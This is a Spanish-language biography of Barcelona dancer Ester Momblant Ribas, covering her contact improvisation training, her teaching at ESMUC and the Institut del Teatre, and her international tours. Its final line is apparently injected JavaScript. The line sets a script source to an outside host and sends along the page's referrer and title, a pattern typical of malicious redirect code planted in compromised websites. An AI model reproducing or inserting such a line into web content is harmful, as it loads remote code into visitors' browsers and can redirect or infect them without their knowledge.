Ester Momblant Ribas

(Barcelona, 1974). En 1996 se traslada a Inglaterra dónde se licencia en danza contemporánea en la University College Chichester. También estudia en l’School for New Dance Development (SNDO) en Ámsterdam, Holanda. Desde 2000 se especializa en ‘Contact Improvisation’ (CI), ‘Improvisación’ y ‘Conciencia Corporal’. Desarrolla su trabajo sobre estas tres áreas ofreciendo clases y cursos, y estudiando en Inglaterra, Bélgica, Holanda y España. A partir del 2002 participa regularmente en conferencias internacionales de Contact Improvisation (ECITE) por toda Europa y también, desde ese año, Ester basa la su trabajo en Barcelona dónde imparte clases, intensivos, y participa en festivales de CI locales. En 2004 obtiene la plaza de profesora titular de Conciencia Corporal para a músicos en la ESMUC (Escola Superior de Música de Catalunya). Des del 2008 es docente en el Màster de musicoteràpia de la Universitat Pompeu Fabra a Barcelona. También, en el 2007 obtiene la plaza de profesora de Contact Improvisation en el ‘Institut del Teatre’ de Barcelona.

En 2006, estudia CI con Nancy Stark Smith en Massachusetts, (EEUU), con quien posteriormente organiza, colabora y trabaja en proyectos de CI sobre l’Underscore en Barcelona (2006) y Paris (2007). Desde este momento Ester combina su trabajo entre la docencia en la ESMUC, con la docencia de CI, tanto a Barcelona como en el extranjero, ofreciendo cursos en Israel, Italia, Francia, Alemania, Austria, Rusia, Brasil y Ucrania. Desde 2007, viaja a Rusia regularmente, colaborando en el desarrollo del CI en este país. En el 2008 hace una gira pedagógica y artística por Brasil, subvencionada por el Instituto Cultural Catalán ‘Ramon Llull’.

Paralelamente, junto con su trabajo docente, Ester colabora en proyectos artísticos, como bailarina; ha actuado en varias ocasiones tanto en el extranjero como en Barcelona, y des del 2009 colabora con el coreógrafo Dominik Buruki en el proyecto ‘Cuerpo des-Armado’.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;